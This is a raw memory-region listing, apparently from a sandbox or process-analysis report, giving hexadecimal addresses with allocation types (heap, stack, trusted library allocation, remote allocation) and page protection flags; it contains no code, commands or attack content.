trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
5F32000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
4BEF000
stack
page read and write
5330000
trusted library allocation
page read and write
2616003D000
heap
page read and write
6A60000
heap
page read and write
7B80000
trusted library allocation
page read and write
AC8000
heap
page read and write
A30000
heap
page read and write
94B0000
unkown
page read and write
A4F0000
trusted library allocation
page read and write
26161140000
trusted library section
page readonly
26160093000
heap
page read and write
86F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
B3D0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
520000
heap
page read and write
9710000
trusted library allocation
page read and write
3130000
trusted library allocation
page execute and read and write
9590000
trusted library allocation
page read and write
9893000
trusted library allocation
page read and write
6ABC000
direct allocation
page read and write
A4D0000
trusted library allocation
page read and write
1CB89A6C000
heap
page read and write
A490000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
28535108000
heap
page read and write
8730000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
26160900000
heap
page read and write
A423000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
3197000
heap
page read and write
B320000
trusted library allocation
page read and write
96F0000
unkown
page read and write
9977000
unkown
page read and write
9A60000
trusted library allocation
page read and write
A473000
trusted library allocation
page read and write
A4F5000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
7102000
direct allocation
page read and write
C98000
heap
page read and write
9660000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
6926000
direct allocation
page read and write
A4F0000
trusted library allocation
page read and write
A8C000
heap
page read and write
E8984FB000
stack
page read and write
529E000
stack
page read and write
A420000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
B3A0000
trusted library allocation
page read and write
18287260000
heap
page read and write
B72F27B000
stack
page read and write
8760000
trusted library allocation
page read and write
BD331FE000
stack
page read and write
9867000
unkown
page read and write
9660000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
A465000
trusted library allocation
page read and write
9495000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
927F7FE000
stack
page read and write
8700000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9860000
unkown
page read and write
9490000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
8639000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9485000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
8700000
unkown
page read and write
290C405A000
heap
page read and write
9600000
trusted library allocation
page read and write
2616582A000
heap
page read and write
5C61000
trusted library allocation
page read and write
261658EC000
heap
page read and write
A423000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
7B95000
unkown
page read and write
2616009E000
heap
page read and write
B290000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9478000
trusted library allocation
page read and write
26160918000
heap
page read and write
A510000
trusted library allocation
page read and write
6AC0000
direct allocation
page read and write
7E8000
heap
page read and write
A3F0000
trusted library allocation
page read and write
9494000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
342D000
stack
page read and write
9670000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
2853507A000
heap
page read and write
20149802000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
850000
heap
page read and write
83D000
heap
page read and write
4CB0000
trusted library allocation
page read and write
26165694000
trusted library allocation
page read and write
26160078000
heap
page read and write
9602000
trusted library allocation
page read and write
8BF000
heap
page read and write
EE430F7000
stack
page read and write
A3F0000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
63927B000
stack
page read and write
E2633FC000
stack
page read and write
B470000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
47D2000
trusted library allocation
page read and write
BE31000
trusted library allocation
page read and write
893000
heap
page read and write
9940000
trusted library allocation
page read and write
7B97000
unkown
page read and write
20148F13000
heap
page read and write
290C404D000
heap
page read and write
A470000
trusted library allocation
page read and write
B340000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
AF82DAB000
stack
page read and write
99A0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
3160000
trusted library allocation
page execute and read and write
A4F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
6A40000
direct allocation
page read and write
96C0000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
2687AA4B000
heap
page read and write
9640000
trusted library allocation
page read and write
8D6000
heap
page read and write
A470000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
A38000
heap
page read and write
A3F3000
trusted library allocation
page read and write
52C1000
heap
page read and write
95F0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
2D4C000
stack
page read and write
21F7E1C0000
heap
page read and write
207E9AC7000
heap
page read and write
9660000
trusted library allocation
page read and write
52A8000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9A00000
unkown
page read and write
7AF0000
trusted library allocation
page execute and read and write
9720000
trusted library allocation
page read and write
98BF000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
94A6000
trusted library allocation
page read and write
888000
heap
page read and write
9660000
trusted library allocation
page read and write
52F0000
heap
page read and write
290C3FC0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
1EE91B20000
heap
page read and write
77A0000
trusted library allocation
page read and write
7B90000
unkown
page read and write
C4AE000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
99E0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
883000
heap
page read and write
A410000
trusted library allocation
page read and write
1DDDC140000
heap
page read and write
B00000
heap
page read and write
3150000
trusted library allocation
page read and write
89B000
heap
page read and write
97D0000
trusted library allocation
page read and write
AF83A7F000
stack
page read and write
9720000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8730000
unkown
page read and write
A4D0000
trusted library allocation
page read and write
9664000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
51C0000
direct allocation
page read and write
5330000
trusted library allocation
page read and write
1E0000
remote allocation
page read and write
7BA0000
trusted library allocation
page execute and read and write
1CB89A47000
heap
page read and write
9550000
trusted library allocation
page read and write
9890000
unkown
page read and write
4843000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
C07D000
trusted library allocation
page read and write
26165848000
heap
page read and write
BE2A000
stack
page read and write
9660000
trusted library allocation
page read and write
26165670000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
B2D0000
trusted library allocation
page read and write
7B90000
unkown
page read and write
9420000
trusted library allocation
page read and write
2DBE000
trusted library allocation
page read and write
5EAE000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
E8983FE000
stack
page read and write
9480000
unkown
page read and write
9760000
unkown
page read and write
2687AA4E000
heap
page read and write
28534F30000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
986917F000
stack
page read and write
9590000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
8C3000
heap
page read and write
21F7E435000
heap
page read and write
B2A0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
1CB897F0000
heap
page read and write
857000
heap
page read and write
6940000
direct allocation
page read and write
8A6000
heap
page read and write
9720000
trusted library allocation
page read and write
290C4066000
heap
page read and write
95C0000
trusted library allocation
page read and write
6BC000
stack
page read and write
97D0000
trusted library allocation
page read and write
9645CEC000
stack
page read and write
2687AB08000
heap
page read and write
9868D7B000
stack
page read and write
47EE000
trusted library allocation
page read and write
8C3000
heap
page read and write
21F7E413000
heap
page read and write
86F0000
unkown
page read and write
26165800000
heap
page read and write
A490000
trusted library allocation
page read and write
1CB89A58000
heap
page read and write
26161160000
trusted library section
page readonly
A460000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
8736000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
8745000
unkown
page read and write
894000
heap
page read and write
95A0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
28535029000
heap
page read and write
865F000
trusted library allocation
page read and write
2687A890000
heap
page read and write
26160029000
heap
page read and write
97C0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
647C000
stack
page read and write
86F0000
trusted library allocation
page read and write
9810000
unkown
page read and write
5580000
heap
page execute and read and write
96D0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
45A4000
heap
page read and write
9610000
trusted library allocation
page read and write
6056000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
C4C6000
trusted library allocation
page read and write
89B000
heap
page read and write
9660000
trusted library allocation
page read and write
9644000
trusted library allocation
page read and write
A4C0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
8740000
unkown
page read and write
7B96000
unkown
page read and write
9800000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
C90000
heap
page read and write
AF8317E000
stack
page read and write
9710000
trusted library allocation
page read and write
927F6FE000
stack
page read and write
9870000
trusted library allocation
page read and write
8BC000
heap
page read and write
1CB89A65000
heap
page read and write
9680000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
9490000
unkown
page read and write
96F0000
unkown
page read and write
28A08A5A000
heap
page read and write
A510000
trusted library allocation
page read and write
B370000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
B72F377000
stack
page read and write
A4F0000
trusted library allocation
page read and write
EE4367F000
stack
page read and write
3130000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9860000
unkown
page read and write
2687A990000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
47D6000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
1CB89B02000
heap
page read and write
5500000
trusted library allocation
page read and write
1CB89A7A000
heap
page read and write
94B0000
unkown
page read and write
AF831FC000
stack
page read and write
96D0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9480000
unkown
page read and write
9660000
trusted library allocation
page read and write
20148D60000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
E2634FE000
stack
page read and write
8700000
unkown
page read and write
8750000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
EB0000
heap
page read and write
8730000
trusted library allocation
page read and write
5FA0000
trusted library allocation
page read and write
20148E00000
heap
page read and write
A4B0000
trusted library allocation
page read and write
A4E0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
50B6000
trusted library allocation
page execute and read and write
A400000
trusted library allocation
page read and write
96D0000
unkown
page read and write
3130000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
B72F57C000
stack
page read and write
84E000
heap
page read and write
20148E68000
heap
page read and write
7600000
trusted library allocation
page read and write
99C5000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9650000
trusted library allocation
page execute and read and write
9480000
trusted library allocation
page read and write
A10000
heap
page read and write
9660000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
5094000
trusted library allocation
page read and write
9807000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
6920000
direct allocation
page read and write
5516000
trusted library allocation
page read and write
96F3000
trusted library allocation
page read and write
E5E000
stack
page read and write
A500000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
8590000
direct allocation
page read and write
94A0000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
7E87DFB000
stack
page read and write
96D0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
53F0000
trusted library allocation
page read and write
A85000
heap
page read and write
77A0000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
68D000
stack
page read and write
53ED000
stack
page read and write
28A08A75000
heap
page read and write
94B0000
trusted library allocation
page read and write
9868AFB000
stack
page read and write
EE4377A000
stack
page read and write
7B90000
unkown
page read and write
8708000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
9667000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
852000
heap
page read and write
A510000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
1828725A000
heap
page read and write
96D0000
trusted library allocation
page read and write
26161130000
trusted library section
page readonly
C0E000
stack
page read and write
8A6000
heap
page read and write
C0A8000
trusted library allocation
page read and write
9CE000
stack
page read and write
A5A000
heap
page read and write
5CC6000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
A513000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
52E0000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
2687AA13000
heap
page read and write
261658A8000
heap
page read and write
8740000
trusted library allocation
page read and write
5ED6000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
986907E000
stack
page read and write
54F0000
trusted library allocation
page read and write
63957B000
stack
page read and write
1CB89A59000
heap
page read and write
89B000
heap
page read and write
99A0000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
96F0000
unkown
page read and write
1DDDC302000
heap
page read and write
9660000
trusted library allocation
page read and write
7A0E000
stack
page read and write
20148E4C000
heap
page read and write
A4D0000
trusted library allocation
page read and write
33AD000
stack
page read and write
3038000
heap
page read and write
1CB89A76000
heap
page read and write
8C3000
heap
page read and write
A494000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
28A08A3D000
heap
page read and write
9A30000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
2687AA8A000
heap
page read and write
8B1000
heap
page read and write
9725000
trusted library allocation
page read and write
94A5000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
26165902000
heap
page read and write
556D000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
8C3000
heap
page read and write
77B0000
trusted library allocation
page read and write
960B000
trusted library allocation
page read and write
B080000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
6063000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
C5A2000
trusted library allocation
page read and write
8705000
trusted library allocation
page read and write
290C4102000
heap
page read and write
8730000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8730000
unkown
page read and write
B290000
trusted library allocation
page read and write
32EE000
stack
page read and write
A470000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
332E000
stack
page read and write
A3F0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
7AEC000
trusted library allocation
page read and write
3A0000
remote allocation
page read and write
B3B0000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9496000
trusted library allocation
page read and write
28535086000
heap
page read and write
85F7000
trusted library allocation
page read and write
26160102000
heap
page read and write
8700000
trusted library allocation
page read and write
5060000
heap
page read and write
B2A0000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
2853503C000
heap
page read and write
7B70000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
5550000
trusted library allocation
page read and write
A4E0000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
28535100000
heap
page read and write
9520000
unkown
page read and write
A420000
trusted library allocation
page read and write
5306000
heap
page read and write
9420000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
6960000
direct allocation
page read and write
9660000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
B03D000
stack
page read and write
9770000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
1828723C000
heap
page read and write
97F5000
unkown
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
6A20000
direct allocation
page read and write
9590000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
63947F000
stack
page read and write
98C2000
trusted library allocation
page read and write
1CB89A85000
heap
page read and write
84F000
stack
page read and write
9720000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
4CDE000
stack
page read and write
8A0000
heap
page read and write
50C2000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
8745000
trusted library allocation
page read and write
2616581D000
heap
page read and write
7B99000
unkown
page read and write
9610000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
7B90000
unkown
page read and write
2DD0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9630000
trusted library allocation
page execute and read and write
A4F0000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
9661000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
34AE000
stack
page read and write
9640000
trusted library allocation
page read and write
50A0000
trusted library allocation
page read and write
47D8000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
899000
heap
page read and write
7B90000
unkown
page read and write
8700000
trusted library allocation
page read and write
2616006E000
heap
page read and write
26161040000
trusted library allocation
page read and write
1EE91D13000
heap
page read and write
97E2000
trusted library allocation
page read and write
9A60000
trusted library allocation
page read and write
B3C0000
trusted library allocation
page read and write
9520000
unkown
page read and write
EE43A7A000
stack
page read and write
B00000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
88E000
stack
page read and write
A450000
trusted library allocation
page read and write
207E9B02000
heap
page read and write
2616008E000
heap
page read and write
9970000
unkown
page read and write
5330000
trusted library allocation
page read and write
AAC000
heap
page read and write
B72F0FC000
stack
page read and write
9480000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
1EE91C3C000
heap
page read and write
E89827D000
stack
page read and write
A510000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
18287080000
heap
page read and write
A4D0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
B291000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
9930000
unkown
page read and write
569E000
stack
page read and write
52C7000
heap
page read and write
83D7CFF000
stack
page read and write
98C3000
trusted library allocation
page read and write
51E0000
direct allocation
page read and write
EE432FC000
stack
page read and write
5100000
trusted library allocation
page read and write
9A05000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
947D000
trusted library allocation
page read and write
B0A5000
trusted library allocation
page read and write
6005000
trusted library allocation
page read and write
B360000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
9A70000
trusted library allocation
page read and write
290C3F10000
heap
page read and write
5330000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
7330000
heap
page read and write
9400000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
98C3000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
85D7000
direct allocation
page read and write
9470000
unkown
page read and write
ACC000
heap
page read and write
9660000
trusted library allocation
page read and write
E262EFE000
stack
page read and write
207E9B13000
heap
page read and write
A420000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
630E000
trusted library allocation
page read and write
C4A7000
trusted library allocation
page read and write
629F000
stack
page read and write
A4F0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
A4E0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
5460000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
B2C0000
trusted library allocation
page read and write
A9E000
heap
page read and write
9610000
trusted library allocation
page read and write
20148E13000
heap
page read and write
7B00000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
AB4000
heap
page read and write
A3F0000
trusted library allocation
page read and write
1010000
heap
page read and write
5090000
trusted library allocation
page read and write
2687AA00000
heap
page read and write
9720000
trusted library allocation
page read and write
5290000
heap
page read and write
97D0000
trusted library allocation
page read and write
5FD000
stack
page read and write
52A4000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
52BF000
heap
page read and write
86F0000
unkown
page read and write
9720000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
207E9AE2000
heap
page read and write
96F0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
5910000
heap
page read and write
94B0000
trusted library allocation
page read and write
26160056000
heap
page read and write
26160802000
heap
page read and write
34FB000
heap
page read and write
26160800000
heap
page read and write
4D80000
remote allocation
page read and write
9660000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
2687AA48000
heap
page read and write
9720000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
EE42CDB000
stack
page read and write
A400000
trusted library allocation
page execute and read and write
8A0000
heap
page read and write
9640000
trusted library allocation
page read and write
96D5000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
2687AB13000
heap
page read and write
9600000
trusted library allocation
page read and write
26165906000
heap
page read and write
5EDE000
trusted library allocation
page read and write
21F7E350000
remote allocation
page read and write
A640000
trusted library allocation
page read and write
895000
heap
page read and write
E262F7E000
stack
page read and write
9662000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
2DC8000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
B1E000
stack
page read and write
95F0000
trusted library allocation
page read and write
1EE91B10000
heap
page read and write
A3F0000
trusted library allocation
page read and write
B72F47F000
stack
page read and write
2615FE60000
heap
page read and write
834C000
stack
page read and write
964687C000
stack
page read and write
1CB89A5F000
heap
page read and write
9480000
unkown
page read and write
4793000
trusted library allocation
page read and write
9A36000
trusted library allocation
page read and write
BD3347D000
stack
page read and write
8D6000
heap
page read and write
A4B0000
trusted library allocation
page read and write
7E8791E000
stack
page read and write
9660000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
851000
heap
page read and write
E2631FF000
stack
page read and write
47A4000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
26160073000
heap
page read and write
A478000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
7B96000
trusted library allocation
page read and write
A3F2000
trusted library allocation
page read and write
A92000
heap
page read and write
5F80000
trusted library allocation
page read and write
290C3F70000
heap
page read and write
9650000
trusted library allocation
page read and write
97F0000
unkown
page read and write
8740000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
EE437FF000
stack
page read and write
1CB89A4E000
heap
page read and write
9490000
trusted library allocation
page read and write
52CE000
heap
page read and write
9610000
trusted library allocation
page read and write
C50F000
trusted library allocation
page read and write
86F0000
unkown
page read and write
A4B0000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
261657A0000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
69E0000
direct allocation
page read and write
9620000
trusted library allocation
page read and write
18287200000
heap
page read and write
A4D0000
trusted library allocation
page read and write
84D000
heap
page read and write
A450000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
9495000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
8730000
trusted library allocation
page execute and read and write
52A0000
trusted library allocation
page read and write
A540000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
4F7E000
stack
page read and write
E8985F7000
stack
page read and write
96D0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
8A8000
heap
page read and write
96D0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
1828725C000
heap
page read and write
1EE91C81000
heap
page read and write
28535013000
heap
page read and write
896000
heap
page read and write
96C0000
unkown
page read and write
E8F000
stack
page read and write
95B0000
trusted library allocation
page read and write
5EE7000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
E262E7B000
stack
page read and write
B080000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
9B5D000
unkown
page read and write
9908000
trusted library allocation
page read and write
1CB89A64000
heap
page read and write
C506000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9570000
unkown
page read and write
7B90000
unkown
page read and write
97F0000
unkown
page read and write
A680000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
48D000
stack
page read and write
28A08A13000
heap
page read and write
AC0000
heap
page read and write
9660000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
5300000
heap
page read and write
9810000
unkown
page read and write
7B90000
unkown
page read and write
9595000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
9480000
unkown
page read and write
7640000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
C42C000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
964637F000
stack
page read and write
B290000
trusted library allocation
page read and write
96F7000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
47AD000
trusted library allocation
page read and write
2616567E000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
18287227000
heap
page read and write
21F7E350000
remote allocation
page read and write
2DD0000
trusted library allocation
page read and write
290C4100000
heap
page read and write
95F0000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
8753000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
7A9F000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
6A80000
direct allocation
page read and write
B3E6000
trusted library allocation
page read and write
62E7000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
863F000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
77B6000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
7AA8000
trusted library allocation
page read and write
261657D0000
trusted library allocation
page read and write
830000
heap
page read and write
7B60000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
BE4D000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
26165678000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
5540000
heap
page execute and read and write
B72EC9B000
stack
page read and write
65C2000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9720000
